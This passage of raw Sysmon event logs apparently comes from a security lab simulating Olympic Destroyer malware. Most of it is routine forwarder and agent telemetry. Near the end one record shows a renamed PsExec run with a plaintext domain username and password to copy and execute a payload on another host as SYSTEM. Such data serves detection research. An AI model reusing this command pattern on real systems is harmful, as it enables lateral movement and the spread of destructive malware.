Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0E4DFD2F9BFC7A076ECF990952390DE,SHA256=9828D82178B54BFA3DF596BB939DB9E5512AA72972AB69B4F07806FCE4713D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:24.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=206C0FF940EF29023B59EF1C6BD88141,SHA256=6BFD54DBF9C31EECCC6B411899FEA9DB642D159DBC2A66B032584FF4A27CE07B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:24.538{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01F0789615ED972314B5DB8345DB35D6,SHA256=86909902E8B006502D7E0AE5DCB6C640E95928515B4A484ECAEAA4FC5E772500,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:25.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DA33C82DA756295D276EE80BA5A059A,SHA256=E432D483CD86BFFAAF552F1C6BA8E495FB8C8FE93C4D1B93B57A15792663486C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:25.538{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482984D1679D9E976B0064021D9E3F48,SHA256=1504200BDE485AE912049443FE6AD9B8F26ED8198033B6530B105D414D39D798,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:26.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5ADE312A2706C81521765550681915F,SHA256=FCC95B27C1C40E69BABDF34946952EC9E7F214E94F79D46063669B43A3A06240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:26.553{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2155113A60DD74A59E66B06935F41D2,SHA256=DC80E23DF343BFB8EB58BD3CFA53191FEB4886FBCA2C6BA84BA5B0C7F83535C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:27.697{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6544AFADF03EA9ACD18B8BC967C89EF3,SHA256=B9062F30751D493D0F87C5F368465964DFE9617FC15DDB93A3DE6831C0D1A6DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:27.606{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F4B69830C664C6A4BC24C9BB261028,SHA256=58341E4A237E366D78DDCD188863C8D2417AF0648817AC8334B1824A09ADCE57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:27.308{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-153MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:24.628{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51572-false10.0.1.12-8000- 23542300x8000000000000000296249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:28.622{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33941BFBAA0D9C1D8FB7A288E6EA2720,SHA256=EE6CC84629BDB831CBF8317CAE74DFFA6F0280A61E76BD3371A8161E2700C03E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:28.710{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E16BE0DD066A65B738829E2017BB378,SHA256=348BBBC4E539B7F89F0175E6C88279428AECDED966ACAC956B13972C198D49D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:28.307{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-154MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:26.579{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49323-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:29.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9064D37FFF4D0E325DBC6F022B214BF,SHA256=9EB5FDB44ED720CA29AA3D0A3A34F5E29C43E718DFF02641DACBC029EC2D3FDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:29.712{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65B6B5BAF25F62281FCBCFFBCC4138AC,SHA256=403F76E95D43FD7C65BB2D89FC5A8C18E4587DAA3866609DF99EF180D0A45D56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:30.639{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C099AF95A7E6671F5477C36D0DB936C,SHA256=32E8699C0AA5F6CCF613730B5E3A96E7F0D172F73236FF51BDAD52168C2E9CA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:30.728{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B1BBFEF484EBBBE9244BAFABF8F8521,SHA256=06C5EBA503F9E0B92D4A3A8D70A0872EAFE24C7AF5A49A99C894E4BA08B78B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:30.415{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=FE5523ABB9084EAD02AC48210AA87084,SHA256=7101F49F044190DB8C5C61C04288C01A4FDD2C3D394C9DB5133815E2F5F8AE97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:31.743{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E858908A661C6915C67D368A9157C2FC,SHA256=CE6CA3B8D58E82CE59F6DD6C573CCDF3C928F432679D59C8BD07B249DF446ADD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:31.659{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D96E84E78BAF89B76BED68DA6D4011,SHA256=CBE93713058168017B8E1E4C47FD70ED8F771F97CF1E7484E78CD342F7351EF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:32.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=735A7D848BE9FEA59A09E4605C9ADC42,SHA256=ACAE6F2B48C0DBE3B69BF868E0085C304A8FC666E086BC10CA2FA98389311EDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:32.775{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1AC58E03F11D7D755510B10B2082DDF,SHA256=EE88B314957C47E7DD0581F58F8B609FA357EFD52F0F1D911604739F775540DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:33.691{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B4C029C8176C9C59F939B6EF1826333,SHA256=347092C237392AFD6B897C95B53A6D52BA3CF32209874B3F1FF06E96975EEE6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:31.712{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49324-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000220283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:33.791{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=971F476655AD0846D1BE09236E188179,SHA256=1A5F44765573068CFEC15FB8874A29C525062854684F3C27E124AC564F5A8D36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:33.507{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=422A6B4C345BC33BEE511B53D103B446,SHA256=0CDF5EC346052D066909112B0B4F29E272CD9FA6BDB0D1E2543FC0C57978C847,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:30.506{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51573-false10.0.1.12-8000- 23542300x8000000000000000296257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:34.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9185482AFC81A3A21BCF02E665FBBB7,SHA256=9C4E963E63ED66CC2E935E1BF5BF7D5BEEF7E533C82C20012B8A79FA47CBD805,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:34.806{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47DBB8F1FE945B1ED2335BE98E387446,SHA256=916DB1CC00EA8D659EC7DFF04049F8C928E7374D12F90B69ACF5A6E86AA84683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:35.900{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A5729D111359298602B0143976F8D48,SHA256=FD32263E499BB80C6760FEE07BD471F27502FEA0E25520E5ECD620CD51C55B3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:35.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FE417947D252D64B031AF0513148F5D,SHA256=9DD0742129FE46D233187908ADC606D265DD43B3BDB6D2D1DB1760A238379428,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:36.724{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604327387C0EDF608A98412BD8EED1C3,SHA256=E4DD2D63018E24508B4E4F495C9A5DD190CB527E978A36F8E90B82139CA1997D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:37.739{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ACEF724E50949BBB51829EF9DF036C4,SHA256=2CBAEEC124546C7467E8726617517600F9C8237B7203A65AB57BE6C3499C9070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:37.118{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E213D07CDBA5A3AE0DB86749EB0DA3C,SHA256=4AB2D3BDBCA73F6BE2350BFA111105629E942590C146D3D60A394FCCFDF73494,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:37.392{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.978{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.978{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.981{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 